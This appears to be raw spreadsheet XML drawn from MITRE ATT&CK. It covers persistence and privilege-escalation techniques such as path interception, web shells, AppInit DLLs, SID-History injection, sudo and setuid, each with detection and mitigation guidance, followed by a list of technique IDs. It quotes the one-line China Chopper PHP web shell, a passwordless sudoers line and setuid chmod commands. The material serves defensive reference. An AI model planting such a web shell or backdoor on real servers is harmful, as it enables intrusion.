The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.
===Search Order Hijacking===
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program.[[CiteRef::Microsoft CreateProcess]][[CiteRef::Hill NT Shell]][[CiteRef::Microsoft WinExec]] However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT.[[CiteRef::MSDN Environment Property]]
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [[Technique/T1038|DLL Search Order Hijacking]].</t>
  </si>
  <si>
    <t>Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through [[Discovery]], and [[Lateral Movement]]. ,</t>
  </si>
  <si>
    <t>Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them[[CiteRef::Microsoft CreateProcess]]. Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate[[CiteRef::MSDN DLL Security]]. Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.
Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations[[CiteRef::Kanthak Sentinel]]. 
Require that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory &lt;code&gt;C:&lt;/code&gt; and system directories, such as &lt;code&gt;C:\Windows\&lt;/code&gt;, to reduce places where malicious files could be placed for execution.
Identify and block potentially malicious software that may be executed through the path interception by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies,[[CiteRef::Corio 2008]] that are capable of auditing and/or blocking unknown executables.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1034</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that creates a new service for persistence. [[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>When operating systems boot up, they can start programs or applications called services that perform background system functions.[[CiteRef::TechNet Services]] A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. 
Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [[Technique/T1036|Masquerading]]. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [[Technique/T1035|Service Execution]].</t>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] used Web shells to maintain access to a victim network and download additional malicious files.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>Anti-virus,File monitoring,Process monitoring,Authentication logs,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload:[[CiteRef::Lee 2013]]
&lt;code&gt;&lt;?php @eval($_POST['password']);&gt;&lt;/code&gt;
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [[Software/S0106|cmd]] or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network.[[CiteRef::US-CERT Alert TA15-314A Web Shells]] ,</t>
  </si>
  <si>
    <t>Ensure that externally facing Web servers are patched regularly to prevent adversary access through [[Technique/T1068|Exploitation of Vulnerability]] to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages. 
Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through [[Credential Access]] and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network.[[CiteRef::US-CERT Alert TA15-314A Web Shells]]</t>
  </si>
  <si>
    <t>Adversary access to Web server with vulnerability or account to upload and serve the Web shell file.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1100</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has installed Web shells onto victim Web servers.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0009|Deep Panda]] uses Web shells on publicly accessible Web servers to access victim networks.[[CiteRef::CrowdStrike Deep Panda Web Shells]]</t>
  </si>
  <si>
    <t>is a Web shell.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has frequently used Web shells, often to maintain access to a victim network.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>One variant of [[Software/S0089|BlackEnergy]] locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.[[CiteRef::F-Secure BlackEnergy 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] is a Web shell that appears to be exclusively used by [[Group/G0027|Threat Group-3390]].[[CiteRef::Dell TG-3390]] It is installed as an ISAPI filter on Exchange servers and shares characteristics with the [[Software/S0020|China Chopper]] Web shell.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; or &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows&lt;/code&gt; are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library.[[CiteRef::Engame Process Injection July 2017]] Similar to [[Technique/T1055|Process Injection]], these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.[[CiteRef::AppInit Registry]]
The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled.[[CiteRef::AppInit Secure Boot]]</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx.[[CiteRef::Engame Process Injection July 2017]] Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs.[[CiteRef::TechNet Autoruns]] 
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for [[Command and Control]], learning details about the environment through [[Discovery]], and conducting [[Lateral Movement]]. ,</t>
  </si>
  <si>
    <t>Upgrade to Windows 8 or later and enable secure boot.
Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown DLLs.</t>
  </si>
  <si>
    <t>Secure boot disabled on systems running Windows 8 and later</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1103</t>
  </si>
  <si>
    <t>A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client).[[CiteRef::Lee 2013]]
Web shells may serve as [[Technique/T1108|Redundant Access]] or as a persistence mechanism in case an adversary's primary access methods are detected and removed.</t>
  </si>
  <si>
    <t>The [[Software/S0020|China Chopper]] backdoor is a Web shell that supports server payloads for many different kinds of server-side scripting languages and contains functionality to access files, connect to a database, and open a virtual command prompt.[[CiteRef::Lee 2013]]</t>
  </si>
  <si>
    <t>Software: ASPXSpy, ASPXTool</t>
  </si>
  <si>
    <t>[[Software/S0073|ASPXSpy]] is a Web shell.[[CiteRef::Dell TG-3390]] The ASPXTool version used by [[Group/G0027|Threat Group-3390]] has been deployed to accessible servers running Internet Information Services (IIS).[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Group/G0050|APT32]] has used Web shells to maintain access to victim websites.[[CiteRef::Volexity OceanLotus Nov 2017]]</t>
  </si>
  <si>
    <t>Service Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or [[Software/S0075|Reg]]. Access to Registry keys is controlled through Access Control Lists and permissions.[[CiteRef::MSDN Registry Key Security]]
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,Windows Registry</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path is changed to a location that is not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through [[Discovery]], and [[Lateral Movement]].
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information.[[CiteRef::TechNet Autoruns]] Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]], so additional logging may need to be configured to gather the appropriate data. ,</t>
  </si>
  <si>
    <t>Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
Identify and block potentially malicious software that may be executed through service abuse by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown programs.</t>
  </si>
  <si>
    <t>Ability to modify a service binPath/ImagePath value in the Registry</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1058</t>
  </si>
  <si>
    <t>[[Software/S0118|Nidiran]] can create a new service named msamger (Microsoft Security Accounts Manager).[[CiteRef::Symantec Backdoor.Nidiran]]</t>
  </si>
  <si>
    <t>One variant of [[Software/S0089|BlackEnergy]] creates a new service using either a hard-coded or randomly generated name.[[CiteRef::F-Secure BlackEnergy 2014]]</t>
  </si>
  <si>
    <t>[[Group/G0046|FIN7]] has used application shim databases for persistence.[[CiteRef::FireEye FIN7 Shim Databases]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] replaces the Sticky Keys binary &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt; for persistence. [[CiteRef::aptsim]]</t>
  </si>
  <si>
    <t>[[Group/G0001|Axiom]] actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.[[CiteRef::Axiom]]</t>
  </si>
  <si>
    <t>[[Group/G0009|Deep Panda]] has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.[[CiteRef::RSA Shell Crew]]</t>
  </si>
  <si>
    <t>[[Software/S0141|Winnti]] sets its DLL file as a new service in the Registry to establish persistence.[[CiteRef::Microsoft Winnti Jan 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0016|APT29]] used sticky-keys to obtain unauthenticated, privileged console access.[[CiteRef::Mandiant No Easy Breach]][[CiteRef::FireEye APT29 Domain Fronting]]</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>[[Software/S0002|Mimikatz]]'s &lt;code&gt;MISC::AddSid&lt;/code&gt; module can appended any SID or user/group account to a user's SID-History.[[CiteRef::Adsecurity Mimikatz Guide]] [[Software/S0002|Mimikatz]] also utilizes [[Technique/T1178|SID-History Injection]] to expand the scope of other components such as generated Kerberos Golden Tickets and DCSync beyond a single domain.[[CiteRef::AdSecurity Kerberos GT Aug 2015]][[CiteRef::Adsecurity Mimikatz Guide]]</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Examine data in user?s SID-History attributes using the PowerShell Get-ADUser Cmdlet[[CiteRef::Microsoft Get-ADUser]], especially users who have SID-History values from the same domain.[[CiteRef::AdSecurity SID History Sept 2015]]
Monitor Account Management events on Domain Controllers for successful and failed changes to SID-History.[[CiteRef::AdSecurity SID History Sept 2015]] [[CiteRef::Microsoft DsAddSidHistory]]
Monitor Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function.[[CiteRef::Microsoft DsAddSidHistory]] ,</t>
  </si>
  <si>
    <t>Clean up SID-History attributes after legitimate account migration is complete.
Apply SID Filtering to domain trusts to exclude SID-History from requests to access domain resources (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine:yes&lt;/code&gt;[[CiteRef::Microsoft Netdom Trust Sept 2012]] on the domain controller). Domain SID Filtering is disabled by default.
Apply SID Filtering to forest trusts to exclude SID-History from request to access forest resources (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /EnableSIDHistory:no&lt;/code&gt;[[CiteRef::Microsoft Netdom Trust Sept 2012]] on the domain controller). Forest SID Filtering is active by default, but may block child domains from transitively accessesing the forest trust.
Ensure SID Filter Quarantining is enabled on trusted external domains (&lt;code&gt;netdom trust &lt;TrustingDomainName&gt; /domain:&lt;TrustedDomainName&gt; /quarantine&lt;/code&gt;[[CiteRef::Microsoft Netdom Trust Sept 2012]] on the domain controller) to ensure authentication requests only include SIDs from that domain. SID Filter Quarantining is automatically enabled on all created external trusts using Server 2003 or later domain controllers.[[CiteRef::Microsoft Trust Considerations Nov 2014]][[CiteRef::Microsoft SID Filtering Quarantining Jan 2009]]</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1178</t>
  </si>
  <si>
    <t>Sudo</t>
  </si>
  <si>
    <t>The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt;[[CiteRef::OSX.Dok Malware]]. 
Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). ,</t>
  </si>
  <si>
    <t>The sudoers file should be strictly edited such that passwords are always required and that users can?t spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1169</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively. Normally an application is run in the current user?s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn?t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;chmod&lt;/code&gt; program can set these bits with via bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;.
An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user?s context.</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set. ,</t>
  </si>
  <si>
    <t>Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1166</t>
  </si>
  <si>
    <t>The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens.[[CiteRef::Microsoft SID]] An account can hold additional SIDs in the SID-History Active Directory attribute[[CiteRef::Microsoft SID-History Attribute]], allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values[[CiteRef::Microsoft Well Known SIDs Jun 2017]] may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [[Technique/T1021|Remote Services]], [[Technique/T1077|Windows Admin Shares]], or [[Technique/T1028|Windows Remote Management]].</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1125</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>T1032</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>T1026</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>T1188</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <t>T1174</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>T1167</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>T1179</t>
  </si>
  <si>
    <t>T1107</t>
  </si>
  <si>
    <t>T1089</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>T1066</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>T1009</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>T1045</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>T1151</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>T1085</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>T1109</t>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>T1016</t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>T1173</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <t>T1154</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>T1002</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>
    <t>T1076</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>T1017</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>T1184</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>T1161</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <t>T1162</t>
  </si>
  <si>
    <t>T1023</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>T1157</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>T1165</t>
  </si>
  <si>
    <t>T1160</t>
  </si>
  <si>
    <t>T1138</t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>T1013</t>
  </si>
  <si>
    <t>T1015</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Test 1</t>
  </si>
  <si>
    <t>Tests Exist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</si>
</sst>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0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="3">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7030A0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="1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bottom style="thin">
        <color theme="1"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="17">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3"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0" fillId="0" borderId="9" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
